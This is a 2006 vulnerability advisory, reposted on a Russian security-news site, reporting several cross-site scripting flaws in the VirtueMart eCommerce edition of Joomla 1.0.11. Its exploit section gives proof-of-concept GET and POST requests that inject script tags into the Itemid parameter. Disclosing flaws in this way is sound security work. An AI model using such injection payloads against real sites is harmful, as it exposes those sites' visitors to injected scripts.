Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [SA22122] PhotoStore Cross-Site Scripting Vulnerabilities

  [SA22092] Opial Audio/Video Download Management Cross-Site Scripting

  [SA22117] eyeOS Cross-Site Scripting Vulnerabilities

  Kietu? <= v4.0.0b2z (url_hit) Remote File Inclusion Exploit

From:Base64 <base640_(at)_gmail.com>
Date:28 сентября 2006 г.
Subject:VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities

VirtueMart Joomla eCommerce Edition CMS Multiple XSS Vulnerabilities


Status: Reported to the Vendor [09/26/2006]
Class: Input Validation Error
Severity: Low


Software Description:
*****************************************************************************
VirtueMart (formerly known as mambo-phpShop) is an Open Source
E-Commerce solution to be used together with a Content Management
System (CMS) called Joomla!

Vulnerability Description:
*****************************************************************************
Multiple cross-site scripting vulnerabilities exist in the Joomla
eCommerce edition software provided by VirtueMart.

Vulnerable Software:
*****************************************************************************
Joomla 1.0.11 eCommerce Edition (prior versions may also be vulnerable)

Exploit:
*****************************************************************************
GET: index.php
option=com_contact&Itemid="><script>alert('XSS')
;</script>
POST: index.php
subscriber_name=1&email=1&task=subscribe&Itemid="><script>
alert('XSS');</script>

Solution:
*****************************************************************************

None at this time.

Credits:
*****************************************************************************
Discovered by Adrian Castro

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород